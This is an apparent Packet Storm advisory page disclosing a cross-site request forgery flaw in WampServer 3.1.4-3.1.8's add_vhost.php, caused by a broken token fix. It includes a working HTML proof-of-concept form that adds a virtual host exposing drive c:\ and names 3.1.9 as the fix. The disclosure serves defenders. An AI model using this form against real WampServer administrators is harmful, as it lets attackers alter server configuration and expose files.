exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Wampserver 3.1.8 Cross Site Request Forgery

Wampserver 3.1.8 Cross Site Request Forgery
Posted Jun 10, 2019
Authored by Imre Rad

Wampserver versions 3.1.4 through 3.1.8 suffer from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 5f29238634e5da41f867c1af60f848f8e1bd8f7c8c7c9ac99b7b56d2d1b57d67

Wampserver 3.1.8 Cross Site Request Forgery

Change Mirror Download
Affected product:
WampServer 3.1.4-3.1.8

Offiical description:
"WampServer is a Windows web development environment. It allows you to
create web applications with Apache2, PHP and a MySQL database.
Alongside, PhpMyAdmin allows you to manage easily your databases."

Official website:
http://www.wampserver.com/en/

Vulnerability description:
The add_vhost.php script in the administration panel of Wampserver was
vulnerable to Cross Site Request Forgery (CVE-2018-8817 -
https://www.exploit-db.com/exploits/44385) in WampServer 3.1.2 and
below.
The synchronizer pattern added as remediation was not implemented
properly, so that WampServer 3.1.3 - 3.1.8 were still vulnerable to
CSRF; attackers could abuse this flaw to get new vhosts added or
existing ones deleted in the Apache configuration file.
Technical requirement of successful exploitation is that the admin has
not opened the add_vhost.php file in the current browser serssion yet
(so the random tokens are not initialized).

Proof of concept form to expose drive c:\:

<form name="csrfWamp" method="post"
action="http://localhost/add_vhost.php?lang=english">
<input type="text" name="vh_name" value="whatever.com">
<textarea type="text" name="vh_folder">c:///</textarea>
<input type="hidden" name="checkadd" value="">
<input type="submit" name="submit" value="Start!">
</form>

Fixed WampServer version:
3.1.9

Official changelog:
http://forum.wampserver.com/read.php?2,138295,155552#msg-155552

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close